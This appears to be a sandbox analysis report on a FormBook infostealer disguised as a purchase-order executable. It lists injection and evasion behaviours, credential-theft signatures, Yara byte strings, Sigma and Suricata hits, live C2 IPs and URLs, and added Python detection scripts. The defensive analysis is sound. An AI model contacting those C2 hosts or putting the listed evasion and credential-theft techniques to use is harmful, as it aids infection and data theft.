Windows Analysis Report
Purchase Order_ AEPL-2324-1126.exe

Overview

General Information

Sample name: Purchase Order_ AEPL-2324-1126.exe
Analysis ID: 1515799
MD5: 4d40b6f064db9c79d427ca2a2c9b87ae
SHA1: aeed2a31d23e0615c1f8ecc2f10c9ad285666b2d
SHA256: 8b117326a85883033f16c21e24a6e07bcc1cb7cced62623a95c1649e7b727688
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Purchase Order_ AEPL-2324-1126.exe (PID: 7444 cmdline: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe" MD5: 4D40B6F064DB9C79D427CA2A2C9B87AE)
    • svchost.exe (PID: 7552 cmdline: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • JkyHsYXxoyjW.exe (PID: 3876 cmdline: "C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • grpconv.exe (PID: 7736 cmdline: "C:\Windows\SysWOW64\grpconv.exe" MD5: 5A13926732E6D349FD060C072BC7FB74)
          • JkyHsYXxoyjW.exe (PID: 3040 cmdline: "C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7936 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps

Source | Rule | Description | Author | Strings
00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f2b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x173a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2c110:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x141ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1628046718.0000000003640000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(table truncated; 11 entries in total)

Yara matches in unpacked PEs

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e4b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x165a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f2b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x173a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
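To re-check a memory dump against the two Windows_Trojan_Formbook_1112e116 hex strings quoted in the table above without a Yara install, here is an added Python scanner (example code, not Joe Sandbox's and not the rule authors'). It reproduces only the two strings the report prints; the full rule carries more strings and its own condition, so a hit from this script is a pointer to run the real rule with yara-python, not a verdict. The filler buffer it scans is constructed for the example.

```python
"""Scan a memory dump for the Windows_Trojan_Formbook_1112e116 hex strings.

Added example, not Joe Sandbox code. The two patterns ($a2, $a3) are the
ones printed in the report; the rule's remaining strings and its condition are
not reproduced (assumption: every hit is reported and the caller decides).
"""
from __future__ import annotations

# Hex strings exactly as printed in the report's Yara match table.
FORMBOOK_STRINGS = {
    "$a2": "74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55",
    "$a3": "1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01",
}


def parse_hex_pattern(text: str) -> bytes:
    """Turn 'AA BB CC' into b'\\xaa\\xbb\\xcc'. Yara wildcards (??) are not supported."""
    parts = text.split()
    if any(len(p) != 2 for p in parts):
        raise ValueError(f"malformed hex pattern: {text!r}")
    return bytes(int(p, 16) for p in parts)


def find_all(buf: bytes, needle: bytes) -> list[int]:
    """Every offset at which needle occurs in buf (overlapping hits allowed)."""
    hits, start = [], 0
    while True:
        idx = buf.find(needle, start)
        if idx < 0:
            return hits
        hits.append(idx)
        start = idx + 1


def scan_dump(buf: bytes, strings: dict[str, str] = FORMBOOK_STRINGS) -> dict[str, list[int]]:
    """Map each named pattern to the offsets where it matches; misses are omitted."""
    result = {}
    for name, pattern in strings.items():
        offsets = find_all(buf, parse_hex_pattern(pattern))
        if offsets:
            result[name] = offsets
    return result


def report(matches: dict[str, list[int]], base: int = 0) -> list[str]:
    """Format hits the way the report does ('0x<offset>:$name'); base rebases to a VA."""
    lines = []
    for name, offsets in sorted(matches.items()):
        for off in offsets:
            lines.append(f"0x{base + off:x}:{name}")
    return lines


def build_sample_dump() -> bytes:
    """Constructed buffer for the example: NOP filler with $a2 at 0x100 and $a3 at 0x200."""
    buf = bytearray(b"\x90" * 0x300)
    a2 = parse_hex_pattern(FORMBOOK_STRINGS["$a2"])
    a3 = parse_hex_pattern(FORMBOOK_STRINGS["$a3"])
    buf[0x100:0x100 + len(a2)] = a2
    buf[0x200:0x200 + len(a3)] = a3
    return bytes(buf)


if __name__ == "__main__":
    # Rebase to 0x400000, the image base the report's svchost.exe dump was taken at.
    for line in report(scan_dump(build_sample_dump()), base=0x400000):
        print(line)
```

On a real dump, read the file into `buf` and pass the region's base address to `report`; the offsets the report prints are region-relative, which is what `scan_dump` returns before rebasing.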

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe", CommandLine: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe", CommandLine|base64offset|contains: :^, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe", ParentImage: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe, ParentProcessId: 7444, ParentProcessName: Purchase Order_ AEPL-2324-1126.exe, ProcessCommandLine: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe", ProcessId: 7552, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe", CommandLine: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe", CommandLine|base64offset|contains: :^, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe", ParentImage: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe, ParentProcessId: 7444, ParentProcessName: Purchase Order_ AEPL-2324-1126.exe, ProcessCommandLine: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe", ProcessId: 7552, ProcessName: svchost.exe
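Both Sigma hits above fire on one process-creation event: svchost.exe (PID 7552) whose parent is the dropper rather than services.exe, and whose command line is the dropper's own path. As an added example (not Joe Sandbox code and not the Sigma rule itself), the Python below re-implements that parent check and adds the second indicator a responder would pull from the same event, the mismatch between the mapped image and the executable the command line names, which is what a created-suspended-then-overwritten svchost.exe looks like in telemetry. The parent allow-list is an assumption that approximates the rule's filter; the benign comparison event is constructed.

```python
"""Re-check the 'Uncommon Svchost Parent Process' hit on the event above, plus a
second indicator the same event carries.

Added example; not Joe Sandbox code and not the Sigma rule. The parent allow-list
approximates the rule's filter (assumption), and the command-line/image mismatch
check is this example's own heuristic.
"""
from __future__ import annotations
import ntpath

# Parents from which svchost.exe is normally launched (assumption: approximates the
# Sigma rule's filter; extend from your own baseline telemetry).
EXPECTED_SVCHOST_PARENTS = {
    "services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe",
    "svchost.exe", "ngen.exe", "tiworker.exe",
}


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _first_token(cmdline: str) -> str:
    """Executable named by a command line, honouring a quoted first argument."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def uncommon_svchost_parent(ev: dict) -> bool:
    """Sigma-style check: Image is svchost.exe but ParentImage is not an expected launcher."""
    if _basename(ev.get("Image", "")) != "svchost.exe":
        return False
    return _basename(ev.get("ParentImage", "")) not in EXPECTED_SVCHOST_PARENTS


def cmdline_image_mismatch(ev: dict) -> bool:
    """Command line names a different executable than the mapped image.

    svchost.exe started with the dropper's own command line is how a hollowed
    process (CreateProcess suspended with svchost.exe as the application but the
    parent's command-line string) appears in process-creation telemetry.
    """
    image = _basename(ev.get("Image", ""))
    claimed = _basename(_first_token(ev.get("CommandLine", "")))
    return bool(image and claimed) and image != claimed


def evaluate(ev: dict) -> list[str]:
    """Names of every indicator the event trips, in a fixed order."""
    findings = []
    if uncommon_svchost_parent(ev):
        findings.append("uncommon_svchost_parent")
    if cmdline_image_mismatch(ev):
        findings.append("cmdline_image_mismatch")
    return findings


# Fields transcribed from the Sigma hit above (PID 7552, parent PID 7444).
REPORT_EVENT = {
    "Image": r"C:\Windows\SysWOW64\svchost.exe",
    "CommandLine": r'"C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe"',
    "ParentImage": r"C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe",
    "ProcessId": 7552,
    "ParentProcessId": 7444,
}

# Constructed benign counterpart: a normal service host started by services.exe.
BENIGN_EVENT = {
    "Image": r"C:\Windows\System32\svchost.exe",
    "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule",
    "ParentImage": r"C:\Windows\System32\services.exe",
    "ProcessId": 1234,
    "ParentProcessId": 700,
}

if __name__ == "__main__":
    for ev in (REPORT_EVENT, BENIGN_EVENT):
        print(ev["ProcessId"], evaluate(ev) or "clean")
```

The second check is the one to keep even where the parent filter is noisy: a legitimate svchost.exe always names itself in its command line, so an image/command-line mismatch on a system binary is a strong hollowing signal regardless of who the parent is.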
Suricata IDS alerts, SID 2855465 (ETPRO MALWARE FormBook CnC Checkin (GET) M2):

Timestamp | SID | Severity | Classtype | Source | Destination | Protocol
2024-09-23T14:36:57.420097+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7:49703 | 81.2.196.19:80 | TCP
2024-09-23T14:37:21.770309+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7:49708 | 103.21.221.4:80 | TCP
2024-09-23T14:37:36.664205+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7:49712 | 38.47.232.196:80 | TCP
2024-09-23T14:37:51.081454+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7:49716 | 188.114.97.3:80 | TCP
2024-09-23T14:38:04.655185+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7:49720 | 195.110.124.133:80 | TCP
2024-09-23T14:38:18.235963+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7:49724 | 162.0.238.246:80 | TCP
2024-09-23T14:38:32.686553+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7:49728 | 198.50.252.64:80 | TCP
2024-09-23T14:38:46.718567+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7:49732 | 85.159.66.93:80 | TCP
2024-09-23T14:39:00.365212+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7:49736 | 142.250.186.51:80 | TCP
2024-09-23T14:39:21.619286+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7:49740 | 199.59.243.227:80 | TCP
2024-09-23T14:39:35.074653+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7:49744 | 62.149.128.40:80 | TCP
2024-09-23T14:39:48.399721+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7:49748 | 3.33.130.190:80 | TCP
2024-09-23T14:40:02.265246+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7:49752 | 154.198.53.36:80 | TCP
2024-09-23T14:40:16.346281+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7:49756 | 154.38.114.205:80 | TCP
2024-09-23T14:40:30.937112+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7:49760 | 84.32.84.32:80 | TCP

Suricata IDS alerts, SID 2855464 (ETPRO MALWARE FormBook CnC Checkin (POST) M3):

Timestamp | SID | Severity | Classtype | Source | Destination | Protocol
2024-09-23T14:37:14.218178+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49704 | 103.21.221.4:80 | TCP
2024-09-23T14:37:16.852379+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49705 | 103.21.221.4:80 | TCP
2024-09-23T14:37:19.356148+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49707 | 103.21.221.4:80 | TCP
2024-09-23T14:37:28.123635+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49709 | 38.47.232.196:80 | TCP
2024-09-23T14:37:30.783145+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49710 | 38.47.232.196:80 | TCP
2024-09-23T14:37:33.546333+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49711 | 38.47.232.196:80 | TCP
2024-09-23T14:37:42.195520+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49713 | 188.114.97.3:80 | TCP
2024-09-23T14:37:45.170542+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49714 | 188.114.97.3:80 | TCP
2024-09-23T14:37:48.552290+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49715 | 188.114.97.3:80 | TCP
2024-09-23T14:37:56.856092+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49717 | 195.110.124.133:80 | TCP
2024-09-23T14:37:59.468926+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49718 | 195.110.124.133:80 | TCP
2024-09-23T14:38:02.168708+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49719 | 195.110.124.133:80 | TCP
2024-09-23T14:38:10.578766+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49721 | 162.0.238.246:80 | TCP
2024-09-23T14:38:13.137368+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49722 | 162.0.238.246:80 | TCP
2024-09-23T14:38:15.731793+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49723 | 162.0.238.246:80 | TCP
2024-09-23T14:38:24.704835+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49725 | 198.50.252.64:80 | TCP
2024-09-23T14:38:27.900283+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49726 | 198.50.252.64:80 | TCP
2024-09-23T14:38:30.166580+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49727 | 198.50.252.64:80 | TCP
2024-09-23T14:38:39.360229+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49729 | 85.159.66.93:80 | TCP
2024-09-23T14:38:42.467299+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49730 | 85.159.66.93:80 | TCP
2024-09-23T14:38:45.014148+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49731 | 85.159.66.93:80 | TCP
2024-09-23T14:38:52.649879+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49733 | 142.250.186.51:80 | TCP
2024-09-23T14:38:55.445163+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49734 | 142.250.186.51:80 | TCP
2024-09-23T14:38:57.763962+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49735 | 142.250.186.51:80 | TCP
2024-09-23T14:39:14.931402+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49737 | 199.59.243.227:80 | TCP
2024-09-23T14:39:16.524563+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49738 | 199.59.243.227:80 | TCP
2024-09-23T14:39:19.088135+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49739 | 199.59.243.227:80 | TCP
2024-09-23T14:39:27.378471+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49741 | 62.149.128.40:80 | TCP
2024-09-23T14:39:29.906818+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49742 | 62.149.128.40:80 | TCP
2024-09-23T14:39:32.458953+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49743 | 62.149.128.40:80 | TCP
2024-09-23T14:39:40.589680+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49745 | 3.33.130.190:80 | TCP
2024-09-23T14:39:44.067449+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49746 | 3.33.130.190:80 | TCP
2024-09-23T14:39:45.831765+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49747 | 3.33.130.190:80 | TCP
2024-09-23T14:39:54.540490+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49749 | 154.198.53.36:80 | TCP
2024-09-23T14:39:57.105227+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49750 | 154.198.53.36:80 | TCP
2024-09-23T14:39:59.935924+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49751 | 154.198.53.36:80 | TCP
2024-09-23T14:40:08.418181+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49753 | 154.38.114.205:80 | TCP
2024-09-23T14:40:11.121460+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49754 | 154.38.114.205:80 | TCP
2024-09-23T14:40:14.093213+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49755 | 154.38.114.205:80 | TCP
2024-09-23T14:40:21.927956+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49757 | 84.32.84.32:80 | TCP
2024-09-23T14:40:24.493137+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49758 | 84.32.84.32:80 | TCP
2024-09-23T14:40:27.052809+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7:49759 | 84.32.84.32:80 | TCP

Suricata IDS alerts, SID 2856318 (ETPRO MALWARE FormBook CnC Checkin (POST) M4):

Timestamp | SID | Severity | Classtype | Source | Destination | Protocol
2024-09-23T14:39:27.378471+0200 | 2856318 | 1 | A Network Trojan was detected | 192.168.2.7:49741 | 62.149.128.40:80 | TCP
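Read in time order, the alert tables show the FormBook check-in loop: three POST check-ins (SID 2855464) and then one GET (SID 2855465) per destination, after which the sample moves on to the next host, roughly every 14 seconds. FormBook walks a list of domains of which most are decoys, so the host that answers is not necessarily the live C2. The added Python below (example code, not Joe Sandbox output) transcribes the first three hosts from the tables and computes that cadence; the rotation heuristic is this example's own reading of the data, not a published rule.

```python
"""Summarise the FormBook check-in cadence visible in the Suricata alert tables.

Added example, not Joe Sandbox output. ALERTS transcribes the first three
destinations from the tables above (timestamp, SID, destination IP; every row is
192.168.2.7 -> dst:80/TCP). SID names come from the Networking section. The
'rotation' heuristic is this example's own, not a vendor rule.
"""
from __future__ import annotations
from collections import OrderedDict
from datetime import datetime

SID_NAMES = {
    2855465: "FormBook CnC Checkin (GET) M2",
    2855464: "FormBook CnC Checkin (POST) M3",
    2856318: "FormBook CnC Checkin (POST) M4",
}

# (timestamp, sid, destination IP) transcribed from the report's alert tables.
ALERTS = [
    ("2024-09-23T14:37:14.218178+0200", 2855464, "103.21.221.4"),
    ("2024-09-23T14:37:16.852379+0200", 2855464, "103.21.221.4"),
    ("2024-09-23T14:37:19.356148+0200", 2855464, "103.21.221.4"),
    ("2024-09-23T14:37:21.770309+0200", 2855465, "103.21.221.4"),
    ("2024-09-23T14:37:28.123635+0200", 2855464, "38.47.232.196"),
    ("2024-09-23T14:37:30.783145+0200", 2855464, "38.47.232.196"),
    ("2024-09-23T14:37:33.546333+0200", 2855464, "38.47.232.196"),
    ("2024-09-23T14:37:36.664205+0200", 2855465, "38.47.232.196"),
    ("2024-09-23T14:37:42.195520+0200", 2855464, "188.114.97.3"),
    ("2024-09-23T14:37:45.170542+0200", 2855464, "188.114.97.3"),
    ("2024-09-23T14:37:48.552290+0200", 2855464, "188.114.97.3"),
    ("2024-09-23T14:37:51.081454+0200", 2855465, "188.114.97.3"),
]


def parse_ts(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def classify(sid: int) -> str:
    """GET / POST / OTHER from the rule name; OTHER for SIDs we have no name for."""
    name = SID_NAMES.get(sid, "")
    return "GET" if "(GET)" in name else "POST" if "(POST)" in name else "OTHER"


def per_host(alerts) -> "OrderedDict[str, dict]":
    """Per destination, in first-seen order: the request sequence and first/last times."""
    hosts: "OrderedDict[str, dict]" = OrderedDict()
    for ts, sid, dst in sorted(alerts, key=lambda a: parse_ts(a[0])):
        t = parse_ts(ts)
        h = hosts.setdefault(dst, {"seq": [], "first": t, "last": t})
        h["seq"].append(classify(sid))
        h["last"] = t
    return hosts


def rotation_gaps(hosts) -> list[float]:
    """Seconds from one host's first alert to the next host's first alert."""
    firsts = [h["first"] for h in hosts.values()]
    return [round((b - a).total_seconds(), 1) for a, b in zip(firsts, firsts[1:])]


def looks_like_formbook_rotation(hosts, min_hosts: int = 3) -> bool:
    """Heuristic: at least min_hosts destinations, each seeing one or more POST
    check-ins followed by exactly one GET, then the sample moving on."""
    if len(hosts) < min_hosts:
        return False
    for h in hosts.values():
        seq = h["seq"]
        if "POST" not in seq or seq.count("GET") != 1 or seq[-1] != "GET":
            return False
    return True


if __name__ == "__main__":
    hosts = per_host(ALERTS)
    for dst, h in hosts.items():
        span = (h["last"] - h["first"]).total_seconds()
        print(f"{dst:16} {'/'.join(h['seq']):24} {span:5.1f}s")
    print("rotation gaps (s):", rotation_gaps(hosts))
    print("FormBook-style rotation:", looks_like_formbook_rotation(hosts))
```

The same grouping over the full table (15 destinations) gives the list a responder should triage: the host that actually replied with content is the one worth pivoting on; the others are the decoys FormBook queries to hide it.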

            AV Detection

Source: Purchase Order_ AEPL-2324-1126.exe | Avira: detected
Source: http://www.tempatmudisini01.click/phdl/ | Avira URL Cloud: Label: malware
Source: http://tempatmudisini01.click/phdl/?76=RacNMaTPN8PTLvXR9NF5eW2iQDieTkk5np6gf4eeXsIapVFDjThj3jiQkVzZm | Avira URL Cloud: Label: malware
Source: http://www.tempatmudisini01.click/phdl/?76=RacNMaTPN8PTLvXR9NF5eW2iQDieTkk5np6gf4eeXsIapVFDjThj3jiQkVzZmExioktz4vqZ0cfToK8eCYqJupED41Yr5DEkLX4m9t/uleGnewHbryEHDsS5u5fKmXjTxI+rab/4BaXG&mtJD_=fvdlJ2L | Avira URL Cloud: Label: malware
Source: chalet-tofane.net | Virustotal: Detection: 8%
Source: tempatmudisini01.click | Virustotal: Detection: 5%
Source: www.tempatmudisini01.click | Virustotal: Detection: 7%
Source: Purchase Order_ AEPL-2324-1126.exe | Virustotal: Detection: 27%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1628046718.0000000003640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3868947164.0000000004200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3858711840.00000000002D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3871192963.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1628574210.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3865120217.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Purchase Order_ AEPL-2324-1126.exe | Joe Sandbox ML: detected
Source: Purchase Order_ AEPL-2324-1126.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: grpconv.pdb | source: svchost.exe, 00000002.00000003.1596658465.0000000003024000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594446965.000000000301B000.00000004.00000020.00020000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000003.00000002.3863139699.0000000000868000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: grpconv.pdbGCTL | source: svchost.exe, 00000002.00000003.1596658465.0000000003024000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594446965.000000000301B000.00000004.00000020.00020000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000003.00000002.3863139699.0000000000868000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: JkyHsYXxoyjW.exe, 00000003.00000002.3862718845.00000000005BE000.00000002.00000001.01000000.00000004.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3858733307.00000000005BE000.00000002.00000001.01000000.00000004.sdmp
